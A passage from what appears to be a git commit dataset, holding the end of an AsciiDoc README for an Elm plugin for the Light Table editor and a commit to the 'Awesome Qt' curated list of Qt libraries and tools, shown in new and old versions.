the plugin will start looking for a elm-package.json in the same directory\nas the hello.elm file resides. 
So the elm client will use `\/home\/myuser\/projects\/hello-elm` as root path and the project assumed to be `hello-elm`\n* If you start of with evaluating util.elm, it will start looking for a `elm-package.json` in the `src` folder, since not finding one it will try the parent directory (and recurse until one found or none can be found).\nHence the root path and project name will be the same\n* If you (with the elm-client still running) later add a .elm file anywhere below `\/home\/myuser\/projects\/hello-elm` and eval or lint (or whatever) on it, the plugin\nwill assume it belongs to the same elm-client and use that.\n\n\n=== A few disclaimers\/general notes\n* If an operation takes some time to respond, it might be that it's because elm is installing packages (first time or you've changed the elm-package.json file)\n* If stuff does't work and you don't get anything sensible indicating why not, it's work trying to remove the folder elm-stuff and run `elm-package install`\nat the command line to see if packages installs correctly (I've experienced that it's not always reliable...)\n\n\n== Usage\n\n=== Linting\nimage::lint.png[width=500]\n\nTo lint an elm file use the command: `Elm: Lint selected file`\n\n* Errors are marked with red underline, warnings with yellow underline\n* Errors\/warnings in dependent files are shown in the console\n\n==== Details and navigation\n* To view details about an error or warning place your cursor inside an underline range and select the\ncommand `Linter: Show details at cursor`\n* To move to next lint result select command `Linter: Move to next result`\n* To move to previous lint result select command `Linter: Move to previous result`\n\n\nNOTE: Rember to save. Linting works on saved files !\n\n\n----\nTIP: Linting on save\nIf you wish to lint on save just add the following to your user behaviors\n\n[:editor.elm :lt.objs.editor.file\/on-save :elm.lint]\n----\n\n\n=== Make (to js)\nTo run make for your elm file\/project use the command: `Elm: Make selected file`\nA .js file is generated in the same directory as the .elm file resides.\nErrors and warnings are handled similar to linting.\n\n\n=== Testing\n[cols=\"1a,1a\"]\n|===\n\n| image::browsertests.png[width=400, role=\"thumb\"]\n| image::consoletests.png[width=400]\n|===\n\n.Preconditions\nThe plugin comes bundled with the https:\/\/github.com\/rtfeldman\/node-elm-test[node-elm-test] node package. It's slighly\nmodified to ensure that it uses the node instance that comes bundled with Light Table.\nSo you **don't** need to install node-elm-test !\n\nOf course you can run browser based tests without problems. The great benefit of using the console runner is that these tests can also be run as part of a ci build.\n\n\n\n==== Quick start\nThe plugin has a feature create a test skeleton subproject. From any (non-test) elm file;\n\n. Invoke the command `Elm: Add test subproject to current project`\n. The plugin will:\n.. Create a test directory\n.. Create a elm-package.json file based on the elm-package.json file in your current project. It will add dependencies\nto https:\/\/github.com\/deadfoxygrandpa\/Elm-Test[elm-test] and https:\/\/github.com\/laszlopandy\/elm-console[elm-console].\nIt will also set up source directories for your test project to include any source directories set up for your root project\n.. It will add a sample console TestRunner.elm and a sample Tests.elm\n.. 
Finally, it will run elm-package install to set you up for subsequently running your tests quickly (this may take a little while the first time)\n. Now you have a great starting point for writing tests and running them\n\n\n==== Running tests\n. Open a test file\n. Select the command `Elm: Test current file`\n. One of two outcomes will occur:\n.. If the test is considered a console test (contains \"consoleRunner\" or \"Console\"); the tests are run using https:\/\/github.com\/rtfeldman\/node-elm-test[node-elm-test].\nResults are shown in the console. In case of errors, a message is displayed in the status bar\n.. If not a console test, the test is assumed to be a browser\/element test and the file is opened in the inline browser (backed by elm-reactor). Tests are run and results are shown using elm-test's elementRunner (or stringRunner if that's what you are using)\n\n\nNOTE: The first time you run a browser test, you might need to reload the page as the reactor might not have completed starting before\nthe tests run (and hence the test file hasn't completed compiling yet). After that it's just a matter of changing tests and reloading (`ctrl-r`)\n\n\n\n\n=== Language docs\n.From an elm file:\n* Select the command: Docs: Search language docs (ctrl-shift-d)\n* Enter search criteria\n* Behold the results\n\nNOTE: Doc search currently picks a random elm file as the basis for search. It uses\nhttps:\/\/github.com\/ElmCast\/elm-oracle[elm-oracle] behind the scenes. Elm-oracle is bundled with the plugin btw.\n\n=== Inline doc\n* With the cursor over something docable press ctrl+d.\n* Inline documentation is displayed (or an error message is shown on the status bar)\n* Ctrl+d again to close the inline doc\n\nNOTE: Only functions that are available through imports (explicit + elm defaults) are docable\n\n=== Autocomplete (incubating)\nOnce an elm editor has a connection (through use of linting, make, inline doc etc)\nthe autocompleter kicks in (sort of (: ).\n\nIt should kick in when you type something (like Signa ... should show completions from Signal etc)\n\n\n.To turn it off (and optionally turn on text hints) just edit your __User behaviors__\n[source,clojure]\n----\n [:editor.elm -:lt.plugins.elm-light\/use-local-hints] ; Turn off the autocompleter\n [:editor.clj :lt.plugins.auto-complete\/textual-hints] ; Enable textual hints again\n----\n\n\n\n\n=== Editor repl\nOnce connected to an elm-project in Light Table, a repl is started running in the background.\nThis means you can evaluate statements from within any given elm editor.\n\n* In an elm file:\n* Position the cursor within the region of a top level expression and press `cmd+enter`.\n* You may also select a region that consists of one or more top level statements and press `cmd+enter`\n** **However** results are shown next to the first line of the selection, even though the actual result might be related to the\n last statement (or if an error, whatever line caused the error)\n* Results are shown inline\n\n\nYou may reset the repl to start with a clean slate. Just select the command: `Elm: Restart repl for current project`\n\nNOTE: Results are currently only shown sensibly if you eval one top level statement at a time. 
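\n\nTo illustrate, a top level statement here means a complete definition. The following is a minimal assumed example (it is not taken from the plugin docs) that you could eval by placing the cursor anywhere inside it and pressing `cmd+enter`:\n\n[source]\n----\nsquare x = x * x\n----\n\nThe result of evaluating the statement is then shown inline next to it.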
\n\nNOTE: The repl is also shared\nbetween all elm editors for a given project.\n\n=== \"Anonymous\" repl\nYou may also create a repl that isn't backed by a file.\n* Select the command `Elm repl: Open a elm repl`\n* You may now eval code as for an Editor repl\n\nNOTE: You need a connected elm project for this to work\n\n\n=== Elm-Reactor\nWhen you connect an elm project, elm-reactor is started in the background.\nTo support multiple projects running in parallel, each project's elm-reactor gets a port from the port range (3000 - 4000)\n\nConvenience commands have been added to view an elm file in the Light Table internal browser.\n.Either\n* Select the command `Elm: View current elm file in browser (elm-reactor)`\n* or `Elm: View current elm file in browser with debugger (elm-reactor)` if you wish the debugger panel opened by default\n\n\nTIP: If you get a blank page (and\/or an error in the console about the address not being available), it might be\nbecause elm-reactor is running make in the background. You might need to be patient and refresh the browser (`cmd+r` for Mac)\n\nWARNING: On Mac, elm-reactor starts two processes. You may experience occurrences where the plugin is unable\nto terminate both of these subprocesses appropriately for now. To be improved.\nYou may close connections by using the command `Connect: Show connect bar` and clicking disconnect for your elm project\n\n\n\n=== Package management\nThe plugin has an interface for doing some handy package-related tasks. It's basically a thin wrapper over\nthe elm-package command with a UI to give you a better overview.\n\nimage::elm-light-pkgs.png[width=500]\n\n==== Open package manager\nFrom an editor with any file under your project, select the command `Elm: Show project packages`\n\nNOTE: You need to have a working network connection, as it retrieves package info from the central elm package repository\n\n\n==== Add a new package\n* Search for a given package in the section for adding packages\n* Use up\/down arrows to navigate the dropdown\n* Use enter to select the package you wish to add\n* Select the version of the package you wish to install\n* Click `Add package`\n* Check the status bar\/console log for feedback on progress and success\/failure\n* If all goes well the view of packages gets updated (as will your elm-package.json file in the background)\n\nNOTE: The feedback from elm-package install is not always the most helpful when there are problems. Sometimes\nit even reports success when nothing has been done. Check out the GitHub repo for elm-package for follow-up on issues\nrelated to this. Be advised that when a package is listed with the `exact` column empty, it means something didn't go well,\neven though elm-package might have reported success.\n\n==== Remove package\nYou can remove packages that are specified in your elm-package.json.\n\n* Click on the `remove` button\nnext to the package in the listing.\n* Your elm-package.json file will get updated\n* elm-package install is invoked to clean up\n* The listing will be updated (with potential transitive deps removed too)\n\n==== Handling other cases\nSometimes you need to edit your `elm-package.json` file directly for elm-package to know what to do.\nThere might also be the case that you have defined an `elm-package.json` but haven't yet invoked any elm command\nthat resulted in a package install (a minimal example of such a file is sketched below). 
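\n\nFor reference, a minimal `elm-package.json` can look something like the following. This is an assumed sketch for the elm 0.16 era this plugin targets; the repository URL and version ranges are illustrative and not shipped with the plugin:\n\n[source,json]\n----\n{\n    \"version\": \"1.0.0\",\n    \"summary\": \"short summary of your project\",\n    \"repository\": \"https:\/\/github.com\/myuser\/hello-elm.git\",\n    \"license\": \"BSD3\",\n    \"source-directories\": [\n        \".\"\n    ],\n    \"exposed-modules\": [],\n    \"dependencies\": {\n        \"elm-lang\/core\": \"3.0.0 <= v < 4.0.0\"\n    },\n    \"elm-version\": \"0.16.0 <= v < 0.17.0\"\n}\n----\n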
\nFor such cases the `Refresh packages` button comes in handy!\n\n==== Package docs\nFor any packages installed (with an exact version) you may view the online docs:\n\n* In the list, click on the package name\n* An LT browser tab is opened (or focused if one already exists) and the package doc for the selected package\nis displayed\n\n\n=== Dependency graph\n\nimage::elm-dep-graph.png[width=800]\n\nYou may view an inline dependency graph of your project's dependencies.\n\n.Either\n* From any file under your project root invoke the command `Elm: Show dependency graph`\n* Alternatively click the `Show dependency graph` button from the package viewer\n\n.Additional info\n* Dashed arrows represent transitive dependencies\n* If you hover over a dependency you will see a short package summary\n* Dependencies found in elm-package.json that `elm-package` failed to install will\nbe shown in red\n* When you update packages in the package viewer, the graph is automatically refreshed\n\n\n\nNOTE: You will need an internet connection for this to work (uses package.elm.lang.org)\n\n=== Elm format\nIn an effort to standardize how Elm code should be formatted, https:\/\/github.com\/avh4\/elm-format[elm-format] was\ncreated. It is still in alpha, but I figured you might just as well start playing with it.\n\n.Precondition\nYou will need to install elm-format and make sure the executable is available in your path for it to work from\nthe plugin. You'll find install instructions in the https:\/\/github.com\/avh4\/elm-format[elm-format] readme.\n\n\n.Format editor contents\n* With an elm file open, select the command `Elm: Format editor contents`\n* If there are no errors, the whole editor is formatted (but any format changes aren't saved)\n* If there are any errors (typically syntax errors), a message is shown in the status bar and details can be found in the console\n\n\n.Format top level expression\nIf for some reason you find yourself wanting to just format a top level expression, this is the command for you.\n* Place the cursor somewhere within the top level expression you wish to format\n* Select the command `Elm: Format top level expression at point`\n\n\n.Format a file\n* With an elm file open, select the command `Elm: Format file`\n\nWARNING: Any unsaved changes will be lost when running this command. This command updates the file backing the editor\nin question.\n\n\n\n.Adding keyboard shortcuts\n[source,clojure]\n----\n\n [:editor.elm.common \"cmd-shift-l\" :elm-format-expression]\n [:editor.elm.common \"cmd-ctrl-l\" :elm-format-buffer]\n----\n\n\n----\nTIP: Format and Lint on save\nIf you wish to format and lint on every save just add the following to your user behaviors\n\n[:editor.elm \"ctrl-s\" :save :elm-format :elm.lint]\n----\n\n\n\n\n=== Note on editor commands\n\n\n==== Select top-level statements\nIf you wish to select a top level statement just invoke the command `Elm: Select top level expression from current expression`\n\nNOTE: The selection algorithm is sort of naive, so there might be cases when the selection doesn't work out quite as you'd hope.\nIn most cases it should work sensibly though.\n\n\n.To enable as a keyboard shortcut in both elm editors and the anonymous elm repl\n[source,clojure]\n----\n [:editor.elm.common \"alt-shift-s\" :elm.select.top.level] ; modify keybinding to your liking!\n----\n\n\n== Contributing\nPull requests are most welcome. 
Please do not include the transpiled files (*_compiled*) in the PR.\n\n== History\n* 0.3.4 Updated to support elm-format 0.2-alpha\n** Added format buffer (keeps unsaved changes) and format expression commands\n* 0.3.3 Fix compatibility with LT 0.8.1. Also tweaked the autocompletion to be a little faster and more accurate.\n* 0.3.2 Module aware autocomplete and remove leading pipes from repl results\n* 0.3.1 Added an inline project dependency graph (using d3)\n* 0.3.0 Added Windows support. See GitHub release notes for details\n* 0.2.0 Improved linting, introduced test support and support for elm-format\n* 0.1.3 Bugfix: Forgot to include react.js (used for rendering the package UI)\n* 0.1.2 Package manager and 0.16.0 fix\n** UI for managing your project packages.\n** 0.16.0 fix: Remove ANSI color codes from errors and warnings shown inline\n* 0.1.1 Maintenance release:\n** Feature to select top level expressions\n** Eval in repl with no selection automatically selects top level expression based on cursor position\n** Syntax highlight multiline strings `\"\"\"`\n** Allow user to select to browse file in reactor with or without debugger\n** Fix: Allow reuse of released reactor ports\n** Add tag :editor.elm.common to allow users to configure common behaviors\/commands for repl and editors more easily\n* 0.1.0 Initial release\n\n== License\nMIT, same as Light Table. See LICENSE.md for details.\n\n\n\n\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8f52925956214b11c5d9e9c37bb6e188d9e47f62","subject":"Change note about the Github Pages version","message":"Change note about the Github Pages version\n","repos":"insideqt\/awesome-qt","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Awesome Qt\n:icons: font\n:toc: preamble\n:toc-title:\n\n:AwesomeQt: https:\/\/insideqt.github.io\/awesome-qt\n\n:MIT: http:\/\/opensource.org\/licenses\/MIT[MIT license.]\n\nA curated list of links to awesome Qt-related libraries, tools, and other\nresources published under Free Software\/Open Source licenses.\n\nifdef::env-github[]\nNOTE: {AwesomeQt}[See this document in Github Pages] for a version with improved\nlegibility.\nendif::[]\n\nDon't forget to check http:\/\/doc.qt.io\/qt-5\/qtmodules.html[the list of essential\nand add-on modules from the Qt project] first! Upcoming modules might be in\n`qt-labs` or `playground` in http:\/\/code.qt.io\/[code.qt.io]. And remember that\nthere is https:\/\/github.com\/fffaraz\/awesome-cpp[Awesome C\/C++] for more projects\nthat don't use Qt.\n\n\n\n== Other registries \/ package managers\n\nThere are other projects that aim to provide not only an entry point to find\nother Qt libraries, but also a tool to download and configure them.\n\nhttp:\/\/inqlude.org\/::\nA large list of Qt libraries, categorized by maturity level and license. It is the\noldest and largest archive of Qt projects. A project from the\nhttp:\/\/www.kde.org[KDE] community.\n\nhttps:\/\/www.qpm.io\/::\nA package manager for Qt, from the http:\/\/www.cutehacks.com\/[Cutehacks]\ndevelopers. 
It is the youngest project, but features the best command line tool to\ninstall packages.\n\nhttp:\/\/www.qt-pods.org\/::\nInspired by the CocoaPods project, a package manager based on git submodules,\nwith even a GUI interface.\n\n\n\n== Libraries\n\n\n=== Databases\n\nhttps:\/\/github.com\/KDAB\/sqlate::\nCompile-time checked type-safe access to SQL databases using C++ templates.\nAllows you to get rid of string-based SQL queries in your Qt application.\n\n\n=== Event loop dispatchers\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_epoll::\nepoll-based event dispatcher\n\nhttps:\/\/github.com\/connectedtable\/qeventdispatcher_epoll::\nepoll event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libevent::\nlibevent-based event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libev::\nlibev-based event dispatcher\n\nhttps:\/\/github.com\/svalaskevicius\/qt-event-dispatcher-libuv::\nlibuv event dispatcher\n\n\n=== File formats\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/karchive\/html\/::\nProvides classes for easy reading, creation and manipulation of \"archive\"\nformats like ZIP and TAR. It also provides transparent compression and\ndecompression of data, like the GZip format, via a subclass of QIODevice.\n\nhttps:\/\/github.com\/flavio\/qjson::\nLibrary that maps JSON data to QVariant objects. Supports Qt 4.\n\nhttps:\/\/github.com\/gaudecker\/qt-json::\nA simple class for parsing JSON data into a QVariant hierarchy and vice versa.\nSupports Qt 4.\n\n\n=== Gaming\n\nhttps:\/\/github.com\/Bacon2D\/Bacon2D::\nFramework to ease 2D game development, providing ready-to-use QML elements\nrepresenting basic game entities needed by most games. Starting with the\ntop-level Game container, which provides a game loop and Scene management, all\nthe way down to entities with Box2D physics and parallax layers with infinite\nscrolling.\n\nhttps:\/\/github.com\/qml-box2d\/qml-box2d::\nBox2D plugin for QML. The goal is to expose the functionality of Box2D as QML\ncomponents, in order to make it easy to write physics-based games in QML.\n\nhttp:\/\/v-play.net\/::\nAllows easy cross-platform mobile game development for all major platforms\nincluding iOS, Android, and BlackBerry.\n\n\n=== Graphics\n\nhttp:\/\/www.kdab.com\/kd-reports\/::\nLets you easily create printable reports by providing all of the necessary\nfeatures for a variety of applications. Reports can be created programmatically,\nusing an easy to use C++ API, or they can be data-driven, creating reports from\nXML or SQL data sources complete with watermarks, headers and footers. Reports\ncan be previewed manually, sent directly to a printer, or saved as PDF files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kimageformats\/html\/::\nProvides additional image format plugins for QtGui. Read support for: Gimp\n(xcf), OpenEXR (exr), Photoshop documents (psd), Sun Raster (ras). Write support\nfor: Encapsulated PostScript (eps), Personal Computer Exchange (pcx), SGI images\n(rgb, rgba, sgi, bw), Softimage PIC (pic), Targa (tga), XView (xv).\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kplotting\/html\/::\nA lightweight and easy to use plot widget.\n\/\/ TODO: Original description was pretty bad. 
I think this is the best I can say\n\/\/ right now, but help improving this is more than welcome.\n\nhttps:\/\/github.com\/gamecreature\/QtAwesome::\nLibrary for using http:\/\/fortawesome.github.io\/Font-Awesome\/[Font Awesome] or\nother icon sets based on font files.\n\nhttp:\/\/qwt.sourceforge.net\/::\nQt Widgets for Technical Applications. Contains GUI components and utility\nclasses which are primarily useful for programs with a technical background.\nBesides a framework for 2D plots it provides scales, sliders, dials, compasses,\nthermometers, wheels and knobs to control or display values, arrays, or ranges\nof type double.\n\n\n=== Hardware detection and interaction\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/bluez-qt\/html\/::\nBluezQt is a library for communication with the BlueZ system and session\ndaemons.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/solid\/html\/::\nA device integration framework. It provides a way of querying and\ninteracting with hardware independently of the underlying operating system.\nIt provides the following features for application developers: Hardware\nDiscovery, Power Management, and Network Management.\n\n\n=== Inter process communication\n\n\n=== Multimedia\n\nhttp:\/\/www.qtav.org\/::\nQtAV is a multimedia playback library based on Qt and FFmpeg. Supports Android,\niOS and desktops.\n\nhttps:\/\/vlc-qt.tano.si\/::\nContains core classes for main media playback and some GUI classes for faster\nmedia player development.\n\n=== Network protocols and web services\n\nhttp:\/\/communi.github.io\/::\nA cross-platform IRC framework. Provides a set of tools for enabling IRC\nconnectivity in Qt-based C++ and QML applications.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kdnssd\/html\/::\nLibrary for handling the DNS-based Service Discovery Protocol (DNS-SD), the\nlayer of Zeroconf that allows network services, such as printers, to be\ndiscovered without any user intervention or centralized infrastructure.\n\nhttps:\/\/github.com\/wiedi\/libmaia::\nXML-RPC library.\n\nhttps:\/\/github.com\/Cutehacks\/qml-pusher::\nQML bindings for the Pusher.com service.\n\nhttps:\/\/github.com\/qxmpp-project\/qxmpp::\nXMPP client and server library. QXmpp strives to be as easy to use as possible:\nthe underlying TCP socket, the core XMPP RFCs (RFC3920 and RFC3921) and XMPP\nextensions have been nicely encapsulated into classes. QXmpp comes with full API\ndocumentation, automatic tests and many examples.\n\n\n=== Other programming languages\n\nhttps:\/\/github.com\/seanchas116\/libqmlbind::\nA C library for easily creating QML bindings for other languages by exporting\nobjects to QML. In use in `ruby-qml`.\n\nhttps:\/\/github.com\/trollixx\/node.qml::\nNode.js compatibility layer to QML applications. Potentially, QML applications\nshould be able to use the majority of Node.js libraries.\n\nhttp:\/\/www.riverbankcomputing.com\/software\/pyqt\/::\nA set of Python 2 and Python 3 bindings for Qt that runs on all platforms\nsupported by Qt including Windows, OS X and Linux. PyQt5 supports Qt 5.\n\nhttp:\/\/thp.io\/2011\/pyotherside\/::\nAsynchronous Python 3 Bindings for Qt 5. This is a QML Plugin that provides\naccess to a Python 3 interpreter from QML.\n\nhttps:\/\/wiki.qt.io\/Category:LanguageBindings::PySide::\nProvides LGPL-licensed Python bindings for Qt. 
It also includes a complete\ntoolchain for rapidly generating bindings for any Qt-based C++ class\nhierarchy.\n\nhttp:\/\/sourceforge.net\/projects\/pythonqt\/::\nEmbeds Python in a Qt application, making classes based on `QObject` accessible\nto the scripting language.\n\nhttps:\/\/github.com\/svalaskevicius\/qtjs-generator::\nQt API bindings generator for Node.js. Exposes the Qt API to JavaScript, running\nin an integrated event loop inside Node.js.\n\nhttp:\/\/seanchas116.github.io\/ruby-qml\/::\nBindings between Ruby and QML. Enables you to write Qt Quick GUIs in Ruby.\n\n\n=== Threading and asynchronous programming\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/threadweaver\/html\/::\nHelper for multithreaded programming. It uses a job-based interface to queue\ntasks and execute them in an efficient way. You simply divide the workload into\njobs, state the dependencies between the jobs and ThreadWeaver will work out the\nmost efficient way of dividing the work between threads within a set of resource\nlimits.\n\n\n=== User Interface\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kguiaddons\/html\/::\nUtilities for graphical user interfaces in the areas of colors, fonts, text,\nimages, keyboard input.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemmodels\/html\/::\nA set of extra item models for the model-view framework.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemviews\/html\/::\nIncludes a set of views, which can be used with item models. It includes views\nfor categorizing lists and to add search filters to flat and hierarchical lists.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kwidgetsaddons\/html\/::\nAction classes that can be added to toolbars or menus, a wide range of widgets\nfor selecting characters, fonts, colors, actions, dates and times, or MIME\ntypes, as well as platform-aware dialogs for configuration pages, message boxes,\nand password requests.\n\nhttps:\/\/github.com\/mikemcquaid\/Qocoa::\nWrappers for OS X Cocoa widgets. {MIT}\n\nhttps:\/\/github.com\/shadone\/qtmacgoodies::\nAdditional widgets\/objects to make applications look more native on Mac OS X,\nlike `MacPreferencesWindow`, `MacStandardIcon` or `MacWindow`.\n\nhttps:\/\/github.com\/cybercatalyst\/qtsystemtrayiconmac::\nExtended QSystemTrayIcon for Mac OS X.\n\n\n=== Web frameworks\n\nhttp:\/\/cutelyst.org\/::\nMVC web framework inspired by Perl's Catalyst.\n\nhttps:\/\/github.com\/jlaine\/qdjango\/::\nQDjango is a web framework written in C++ and built on top of the Qt library.\nWhere possible it tries to follow django's API, hence its name.\n\nhttp:\/\/www.treefrogframework.org\/::\nHigh-speed and full-stack web application framework based on C++ and Qt, which\nsupports the HTTP and WebSocket protocols. Web applications can run faster than\nthose written in lightweight programming languages. 
In application development, it provides an\nO\/R mapping system and template system on an MVC architecture, and aims to achieve\nhigh productivity through the policy of convention over configuration.\n\nhttps:\/\/github.com\/vinipsmaker\/tufao::\nTuf\u00e3o is a web framework for C++ that makes use of Qt's object communication\nsystem (signals & slots).\n\n\n=== Miscellany\n\nhttps:\/\/github.com\/sergey-shambir\/breakpad-qt::\nCross-platform crash handler, implemented as a wrapper around google-breakpad.\n\nhttps:\/\/github.com\/dschmidt\/libcrashreporter-qt::\nProvides an easy integration of Google Breakpad crash reporting into a Qt\napplication.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kconfig\/html\/::\nProvides an advanced configuration system. The core provides access to the\nfiles, with a code generation system to have type safe access to the\nconfiguration, which features cascading files (global versus local), shell\nexpansion, and locking down options. The GUI provides a way to hook widgets to\nthe configuration so that they are automatically initialized from the\nconfiguration and automatically propagate their changes to their respective\nconfiguration files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kcoreaddons\/html\/::\nSupport classes for manipulating mime types, autosaving files, creating backup\nfiles, generating random sequences, performing text manipulations such as macro\nreplacement, accessing user information and more.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/ki18n\/html\/::\nProvides functionality for internationalizing user interface text in\napplications, based on the GNU Gettext translation system. It wraps the standard\nGettext functionality, so that the programmers and translators can use the\nfamiliar Gettext tools and workflows. KI18n provides additional functionality:\nargument capturing, customizable markup, and translation scripting.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kidletime\/html\/::\nReports information on idle time. It is useful not only for finding out about\nthe current idle time of the PC, but also for getting notified upon idle time\nevents, such as custom timeouts or user activity.\n\nhttps:\/\/github.com\/Roxee\/qt-roxeemegaup\/::\nWrapper around Sparkle and WinSparkle.\n\nhttps:\/\/github.com\/Roxee\/qt-roxeeplatipus::\nA collection of helpers and additional functionalities for Qt (media key\nsupport, OS X remote control, fullscreen native window hack).\n\nhttps:\/\/github.com\/Roxee\/qt-roxeesinapp::\nAn up-to-date QtSingleApplication fork.\n\nhttps:\/\/github.com\/VerbalExpressions\/QtVerbalExpressions::\nRegular Expressions made easy. Match and replace in strings with an easy to use\nAPI.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/sonnet\/html\/::\nPlugin-based spell checking library for Qt-based applications. It supports\nseveral different plugins, including HSpell, Enchant, ASpell and HUNSPELL. It\nalso supports automated language detection, based on a combination of different\nalgorithms.\n\n\n== Tools\n\nhttps:\/\/github.com\/sletta\/dqml::\nA simple live coding environment for QML. 
It will track the directory where a\nQML file is located and continuously update the view where it is located.\nSupports pushing files to a remote system which will reload the received files.\n\nhttps:\/\/github.com\/KDAB\/GammaRay::\nGammaRay is a tool to poke around in a Qt application and also to manipulate the\napplication to some extent.\n\nhttps:\/\/github.com\/Pelagicore\/qmllive::\nA live coding environment for QML. Allows you to reload your QML view when a file in\nyour project changes. This can be done on the same device using the QmlLiveBench\nor on a remote device using the QmlLiveRuntime.\n\nhttps:\/\/github.com\/robertknight\/Qt-Inspector::\nUtility to browse the Qt object tree of a running Qt application and edit object\nproperties on the fly.\n\n\n\n== Off topic\n\nNOTE: Stuff that might not integrate at all with Qt's types, API, event loop,\netc., but which an application built with Qt can still leverage well enough, because\nit is cross-platform native code that fulfills a common use case of the typical\nQt applications.\n\nhttps:\/\/github.com\/Mendeley\/breakpad::\nThis is a fork of Google Breakpad, a multi-platform crash reporting system,\nwhich is used by Mendeley Desktop under Windows, Mac and Linux.\n\nhttps:\/\/github.com\/Mendeley\/Update-Installer::\nSmall cross-platform software update installer.\n","old_contents":"= Awesome Qt\n:icons: font\n:toc: preamble\n:toc-title:\n\n:AwesomeQt: https:\/\/insideqt.github.io\/awesome-qt\n\n:MIT: http:\/\/opensource.org\/licenses\/MIT[MIT license.]\n\nA curated list of links to awesome Qt-related libraries, tools, and other\nresources published under Free Software\/Open Source licenses.\n\nifdef::env-github[]\nNOTE: This list is {AwesomeQt}[also available in Github Pages] with an improved\nrendering for better legibility.\nendif::[]\n\nDon't forget to check http:\/\/doc.qt.io\/qt-5\/qtmodules.html[the list of essential\nand add-on modules from the Qt project] first! Upcoming modules might be in\n`qt-labs` or `playground` in http:\/\/code.qt.io\/[code.qt.io]. And remember that\nthere is https:\/\/github.com\/fffaraz\/awesome-cpp[Awesome C\/C++] for more projects\nthat don't use Qt.\n\n\n\n== Other registries \/ package managers\n\nThere are other projects that aim to provide not only an entry point to find\nother Qt libraries, but also a tool to download and configure them.\n\nhttp:\/\/inqlude.org\/::\nA large list of Qt libraries, categorized by maturity level and license. It is the\noldest and largest archive of Qt projects. A project from the\nhttp:\/\/www.kde.org[KDE] community.\n\nhttps:\/\/www.qpm.io\/::\nA package manager for Qt, from the http:\/\/www.cutehacks.com\/[Cutehacks]\ndevelopers. 
It is the youngest project, but features the best command line tool to\ninstall packages.\n\nhttp:\/\/www.qt-pods.org\/::\nInspired by the CocoaPods project, a package manager based on git submodules,\nwith even a GUI interface.\n\n\n\n== Libraries\n\n\n=== Databases\n\nhttps:\/\/github.com\/KDAB\/sqlate::\nCompile-time checked type-safe access to SQL databases using C++ templates.\nAllows you to get rid of string-based SQL queries in your Qt application.\n\n\n=== Event loop dispatchers\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_epoll::\nepoll-based event dispatcher\n\nhttps:\/\/github.com\/connectedtable\/qeventdispatcher_epoll::\nepoll event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libevent::\nlibevent-based event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libev::\nlibev-based event dispatcher\n\nhttps:\/\/github.com\/svalaskevicius\/qt-event-dispatcher-libuv::\nlibuv event dispatcher\n\n\n=== File formats\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/karchive\/html\/::\nProvides classes for easy reading, creation and manipulation of \"archive\"\nformats like ZIP and TAR. It also provides transparent compression and\ndecompression of data, like the GZip format, via a subclass of QIODevice.\n\nhttps:\/\/github.com\/flavio\/qjson::\nLibrary that maps JSON data to QVariant objects. Supports Qt 4.\n\nhttps:\/\/github.com\/gaudecker\/qt-json::\nA simple class for parsing JSON data into a QVariant hierarchy and vice versa.\nSupports Qt 4.\n\n\n=== Gaming\n\nhttps:\/\/github.com\/Bacon2D\/Bacon2D::\nFramework to ease 2D game development, providing ready-to-use QML elements\nrepresenting basic game entities needed by most games. Starting with the\ntop-level Game container, which provides a game loop and Scene management, all\nthe way down to entities with Box2D physics and parallax layers with infinite\nscrolling.\n\nhttps:\/\/github.com\/qml-box2d\/qml-box2d::\nBox2D plugin for QML. The goal is to expose the functionality of Box2D as QML\ncomponents, in order to make it easy to write physics-based games in QML.\n\nhttp:\/\/v-play.net\/::\nAllows easy cross-platform mobile game development for all major platforms\nincluding iOS, Android, and BlackBerry.\n\n\n=== Graphics\n\nhttp:\/\/www.kdab.com\/kd-reports\/::\nLets you easily create printable reports by providing all of the necessary\nfeatures for a variety of applications. Reports can be created programmatically,\nusing an easy to use C++ API, or they can be data-driven, creating reports from\nXML or SQL data sources complete with watermarks, headers and footers. Reports\ncan be previewed manually, sent directly to a printer, or saved as PDF files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kimageformats\/html\/::\nProvides additional image format plugins for QtGui. Read support for: Gimp\n(xcf), OpenEXR (exr), Photoshop documents (psd), Sun Raster (ras). Write support\nfor: Encapsulated PostScript (eps), Personal Computer Exchange (pcx), SGI images\n(rgb, rgba, sgi, bw), Softimage PIC (pic), Targa (tga), XView (xv).\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kplotting\/html\/::\nA lightweight and easy to use plot widget.\n\/\/ TODO: Original description was pretty bad. 
